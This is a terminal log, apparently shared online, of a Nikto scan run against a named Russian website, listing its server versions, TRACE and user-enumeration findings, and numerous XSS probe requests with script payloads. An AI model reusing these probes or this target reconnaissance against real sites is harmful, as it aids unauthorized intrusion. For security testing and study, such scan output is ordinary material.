free_kode freekode-mashine hck sql nikto -h tltinfo ru -T 147 Nikto v2

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
free_kode@freekode-mashine:~/hck/sql> nikto -h tltinfo.ru -T 147
- Nikto v2.03/2.04
---------------------------------------------------------------------------
+ Target IP: 195.144.201.210
+ Target Hostname: tltinfo.ru
+ Target Port: 80
+ Start Time: 2009-05-10 22:43:40
---------------------------------------------------------------------------
+ Server: Apache/1.3.31 (ALT Linux/alt10) PHP/4.3.9-dev/ALT rus/PL30.20
- /robots.txt - contains 4 'disallow' entries which should be manually viewed. (GET)
- Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP method ('Allow' Header): 'TRACE' is typically only used for debugging and should be disabled. This message does not mean it is vulnerable to XST.
+ OSVDB-0: Retrieved X-Powered-By header: PHP/4.3.9-dev/ALT
+ OSVDB-0: ETag header found on server, inode: 3260484, size: 101, mtime: 0x488ecedb
+ Apache/1.3.31 appears to be outdated (current is at least Apache/2.2.9). Apache 1.3.39 and 2.0.61 are also current.
+ rus/PL30.20 appears to be outdated (current is at least PL30.22)
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OSVDB-637: GET /~root - Enumeration of users is possible by requesting ~username (responds with 'Forbidden' for users, 'not found' for non-existent users).
+ OSVDB-0: GET /index.php?option=search&searchword=<script>alert(document.cookie);</script> : Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /index.php?dir=<script>alert('Vulnerable')</script> : Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.
+ OSVDB-32774: GET /phpinfo.php?VARIABLE=<script>alert('Vulnerable')</script> : Contains PHP configuration information and is vulnerable to Cross Site Scripting (XSS).
+ OSVDB-0: GET /index.php?file=Liens&op=\"><script>alert('Vulnerable');</script> : Nuked-klan 1.3b is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /index.php?action=storenew&username=<script>alert('Vulnerable')</script> : SunShop is vulnerable to Cross Site Scripting (XSS) in the signup page. CA-200-02.
+ OSVDB-0: GET /index.php/\"><script><script>alert(document.cookie)</script>< : eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script> : eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search : eZ publish v3 and prior allow Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-0: GET /?mod=<script>alert(document.cookie)</script>&op=browse : Sage 1.0b3 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-25497: GET /index.php?rep=<script>alert(document.cookie)</script> : GPhotos index.php rep Variable XSS.
+ OSVDB-877: TRACE / : TRACE option appears to allow XSS or credential theft. See http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details
+ OSVDB-12606: GET /index.php?err=3&email=\"><script>alert(document.cookie)</script> : MySQL Eventum is vulnerable to XSS in the email field.
+ OSVDB-2790: GET /index.php?vo=\"><script>alert(document.cookie);</script> : Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.